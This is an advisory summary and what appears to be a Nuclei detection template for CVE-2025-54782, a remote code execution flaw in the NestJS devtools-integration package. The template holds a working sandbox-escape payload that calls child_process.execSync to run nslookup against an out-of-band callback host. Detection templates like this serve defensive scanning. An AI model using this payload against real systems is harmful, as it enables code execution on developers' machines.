Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox.
PoC代码[已公开]
id: CVE-2025-54782
info:
name: NestJS DevTools Integration - Remote Code Execution
author: nukunga
severity: critical
description: |
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox.
remediation: This is fixed in version 0.2.1.
reference:
- https://socket.dev/blog/nestjs-rce-vuln
- https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
- https://nvd.nist.gov/vuln/detail/CVE-2025-54782
classification:
cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
cvss-score: 9.4
cve-id: CVE-2025-54782
epss-score: 0.03684
epss-percentile: 0.87475
cwe-id: CWE-77,CWE-352,CWE-78
metadata:
verified: true
max-request: 1
shodan-query: "devtools.nestjs.com"
tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth,vkev
http:
- raw:
- |
POST /inspector/graph/interact HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: content_type
words:
- "application/plain"
- type: status
status:
- 200
# digest: 4a0a004730450220545055b23287a70ed46a59343e5d83573ec8a53a794f5a8675aa61952fac24f9022100feee598881d64b4da5bab491e9901a2ac0411643429520e47c64f1c4d53bf04f:922c64590222798bb761d5b6d8e72950